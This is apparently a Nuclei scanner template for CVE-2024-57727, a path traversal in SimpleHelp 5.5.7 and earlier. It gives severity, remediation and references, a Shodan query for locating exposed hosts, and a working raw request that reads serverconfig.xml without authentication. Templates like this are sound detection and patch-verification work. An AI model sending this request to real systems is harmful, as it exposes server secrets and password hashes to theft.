id: CVE-2024-57727 info: name: SimpleHelp <= 5.5.7 - Unauthenticated Path Traversal author: iamnoooob,rootxharsh,pdresearch,3th1cyuk1 severity: high description: | SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords. impact: | Unauthenticated attackers can exploit path traversal to download server configuration files containing secrets, hashed passwords, and other sensitive information. remediation: | Update SimpleHelp to version 5.5.8 or later to address the path traversal vulnerabilities. reference: - https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier - https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-57727 cwe-id: CWE-22 epss-score: 0.94049 epss-percentile: 0.99906 cpe: cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: simple-help product: simplehelp shodan-query: html:"SimpleHelp" tags: cve,cve2024,simplehelp,lfi,kev,vkev,vuln http: - raw: - | GET /toolbox-resource/../serverconfig.xml HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '' condition: and - type: word part: content_type words: - 'application/octet-stream' # digest: 490a004630440220271ddae209cc88b85e191b74460bc4f87ac7a778eb0bf66908579e7d824ab7a30220368bf31ac3249459c8281fcf2d6770adce63503884c5a43e3d9a63300178c48e:922c64590222798bb761d5b6d8e72950